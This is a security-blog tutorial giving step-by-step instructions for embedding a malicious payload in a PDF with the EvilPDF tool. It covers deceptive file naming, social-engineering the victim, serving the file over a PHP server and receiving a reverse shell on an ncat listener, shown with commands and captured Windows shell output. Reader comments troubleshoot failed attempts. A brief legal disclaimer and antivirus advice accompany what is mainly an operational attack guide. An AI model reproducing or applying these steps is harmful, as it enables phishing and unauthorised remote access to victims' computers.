Steps to embed payload in PDF [100% Working]


Ethical hacking, Kali Linux, Security

Reviewer: Deepak Prasad

Over the years the adobe reader has had a bunch of vulnerabilities which are exploited by the hackers. Hackers embed payload in PDF which looks legitimate and maybe important in the eyes of the victim. One factor that makes this hack successful is due to the fact that adobe reader is a common PDF reader in computers around the world. Over time, Linux tools have been developed to embed payload in PDF with the main focus being on simplifying the process of embedding the payload.

By the end of this guide, you will be able to embed payload in PDF, send it to the victim and gain access to his/her machine remotely.

 

WARNING:
Hacking is an illegal activity and you can be charged in a court of law. Make sure you have a mutual consent with the victim prior attacking his/her system. This guide is for education purposes only.

 

Pre-requisites

 

What you should know

  • Knowledge of using a terminal.
  • Have a legitimate PDF on which we will embed a payload
  • Have metasploit installed.(This is optional if you want to start the listener from the metasploit terminal and generate custom payloads)

 

With that in mind, let’s jump right into our tutorial.

 

Steps to embed payload in pdf with EvilPDF tool

This is a minimal tool made in python which is used to embed payload in PDF and launch the listener. The creators of the tool focused on simplifying the process of launching the pdf attack.

 

Step 1: Installing EvilPDF tool

The first step is to clone the evilpdf repository from github. We will use the well known command to clone the repository.

# git clone https://github.com/superzerosec/evilpdf
Cloning into 'evilpdf'...
remote: Enumerating objects: 8, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (7/7), done.
remote: Total 8 (delta 0), reused 8 (delta 0), pack-reused 0
Unpacking objects: 100% (8/8), done.

 

Step 2: Install required dependencies

After the download is completed, we have to install the dependencies required for the tool to work without running in errors.

cd evilpdf

Then install the required dependencies according to evilpdf tool official repository on github.

python -m pip install pypdf2

 

Step 3: Running the evilpdf tool

We now run the evilpdf tool to start the process to embed payload in PDF.

python evilpdf.py

When we start the tool, it should look as shown in the screenshot below.

embed a payload

 

Step 4: provide the path to the legitimate pdf

As shown on the above screen, we have to provide a path to the legitimate pdf file on which we will embed our payload. Make sure to use a pdf file of interest to the target. Ensure every aspect is compelling him/her to open the file. You have to employ your social engineering skills here.

 

Step 5: Choosing the file to embed a payload on

On this step we will choose what kind of file we want to embed in a pdf. We can embed a custom file (If you already generated the payload using metasploit you will just provide its path on your PC)

└─$ python3 evilpdf.py

 __________     .__.__ __________________  ___________
 \_   _____/__  _|__|  |\______   \______ \ \_   _____/
  |    __)_\  \/ /  |  | |     ___/|    |  \ |    __)   
  |        \\   /|  |  |_|    |    |    `   \|     \    
 /_______  / \_/ |__|____/____|   /_______  /\___  /    
         \/                               \/     \/     

 v1.1 coded by @linux_choice (twitter)
 github.com/thelinuxchoice/evilpdf
[+] PDF path (Default: adobe.pdf ): /home/toxic/Desktop/lifeguide.pdf
[+] Append custom file? [Y/n] n

 

Step 6: Choosing the name for the file.

In this step we have to chose a name to call the file. Once again, use words that will compel the victim to download and run the file on his/her pc. In our case, we can call it adobe_update.

embed a payload

 

Step 7: Setting the LHOST an the LPORT

This is where you are required to enter the host on which we will run the listener on. You can use the below command to know your LHOST

ifconfig

Once you have set your host IP address, you will be required to choose the port to use. These configurations of the port and the host are the ones to be used when after we embed payload in PDF. You should use a less common port in order to ensure the success of your attack since the common ports are already being used by existing services and any malicious activity on these ports will be easily detected.

embed a payload

 

Step 8: Setting the phishing url

When required to enter the phishing url on the next step, you can leave it as default as shown below and wait as the evil too goes on with the process to embed payload in PDF. After embedding is over we just have to start the listener. The url is the page where the victim will be redirected to as our payload exe downloads.

embed a payload

 

Step 9: Delivering the pdf in order to gain a shell

Having completed the process to embed payload in a pdf, we now have to expose our server in order to deliver the pdf in an easier way to the victim machine. Evilpdf gives us a guide on how to do that. In the above screen you can see the command we are to use to expose the server. In our case we can use.

php -S 192.168.0.11:3333

Below is the output when we run the command on a terminal

$ php -S 192.168.0.11:3333
[Tue Nov  9 04:33:07 2021] PHP 7.4.15 Development Server (http://192.168.0.11:3333) started

We can now navigate to our browser in the target machine and enter the provided link in order to download our pdf which has the payload.

Once the victim opens the PDF file which we named based on victims interests, it will next prompt for user to confirm if they want to open the file.

Steps to embed payload in PDF [100% Working]

 

Once the victim confirms this prompt, we will have a remote connection to the victim’s PC.

Steps to embed payload in PDF [100% Working]

 

After the connection we get a shell as shown below

[+] Start Listener? [Y/n] y
[+] Listening connection:

Ncat: Version 7.80 ( org/ncat" >https://nmap>org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.0.130.
Ncat: Connection from 192.168.0.130:54784.
Microsoft Windows [Version 10.0.18361.889]
(c) 2019 Microsoft Corporation. All rights reserved.

c:\Users\administrator\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is 7B9Y - 070D

Directory of C:\Users\administrator\Downloads
9/11/2021 4:24 AM <DIR> .
9/11/2021 4:24 AM <DIR> ..
9/11/2021 4:26 AM 20,983,845 (by-Adam-Grant)-Give-and-Take

 

Conclusion

In the above guide we were able to embed payload in PDF and run it on a victim machine gaining access to the victim machine the same way hackers do in order to steal valuable information from the victims who fell in our trap. For a person who does not understand the non-technical stuff, he/she can be lured to installing a malware into his/her computer.

We recommend all the users to ensure their anti viruses and operating systems are up to date in order to avoid being victims. Alternatively, they can choose to use other pdf readers which are more secure and also ensure the pdf readers are up to date. With the help of processes such as obfuscation and other antivirus evasion techniques, a hacker can get into your PC without raising any suspicion.

 

Further Reading

Bypassing antivirus detection on a PDF exploit

 

Related Keywords: how to make pdf payload, msfvenom create pdf payload, msfvenom create pdf payload android, undetectable pdf payload
pdf payload github, create malicious pdf, hide android payload in pdf, pdf payload metasploit termux

Kennedy Muthii

Kennedy Muthii

He is an accomplished professional proficient in Python, ethical hacking, Linux, cybersecurity, and OSINT. With a track record including winning a national cybersecurity contest, launching a startup in Kenya, and holding a degree in information science, he is currently engaged in cutting-edge research in ethical hacking. You can connect with him on his LinkedIn profile.

Can't find what you're searching for? Let us assist you.

Enter your query below, and we'll provide instant results tailored to your needs.

If my articles on GoLinuxCloud has helped you, kindly consider buying me a coffee as a token of appreciation.

Buy GoLinuxCloud a Coffee

For any other feedbacks or questions you can send mail to admin@golinuxcloud.com

Thank You for your support!!

25 thoughts on “Steps to embed payload in PDF [100% Working]”

  1. Great tutorial. If I just want to work with the payload, the pdf file to analyze it and using pdfcop I get a hash that I insert into virustotal but the hash does not have matches in virustotal so it does not tell me that the file is infected? Is there a way to analyze this file in a different way to see the payload in the PDF file?

    Reply
  2. Hello, Thank you for that Tutorial. I was able to create everything and when I’m executing the complete command php -S 0.0.0.0:3333 & \ & ssh -R 80:localhost:3333 etc….. I’m getting the link that I must use and when using that link I’m able to download the file but when opening it nothing happen and my listener is on. Would you have a hint ? Do I absolutely need to open the file with Adobe reader ? Or If I open it in linux for example it should work ?

    Thank you

    Reply
  3. [1;31m___________     .__.__ [1;93m__________________  ___________ [0m
     [1;31m\_   _____/__  _|__|  |[1;93m\______   \______ \ \_   _____/ [0m
     [1;31m |    __)_\  \/ /  |  |[1;93m |     ___/|    |  \ |    __)   [0m
     [1;77m |        \\   /|  |  |_|    |    |    `   \|     \    [0m
     [1;77m/_______  / \_/ |__|____/____|   /_______  /\___  /    [0m
     [1;77m        \/                               \/     \/     [0m
     [1;77mv1.1 coded by @linux_choice (twitter)
     [1;77mgithub.com/thelinuxchoice/evilpdf[0m
    
    Traceback (most recent call last):
      File "C:\Users\Administrator\Desktop\evilpdf.py", line 246, in 
        dependencies()
      File "C:\Users\Administrator\Desktop\evilpdf.py", line 19, in dependencies
        os.system('command -v base64 > /dev/null 2>&1 || { echo >&2 "Install base64"; }')
        ^^
    NameError: name 'os' is not defined
    Reply

Leave a Comment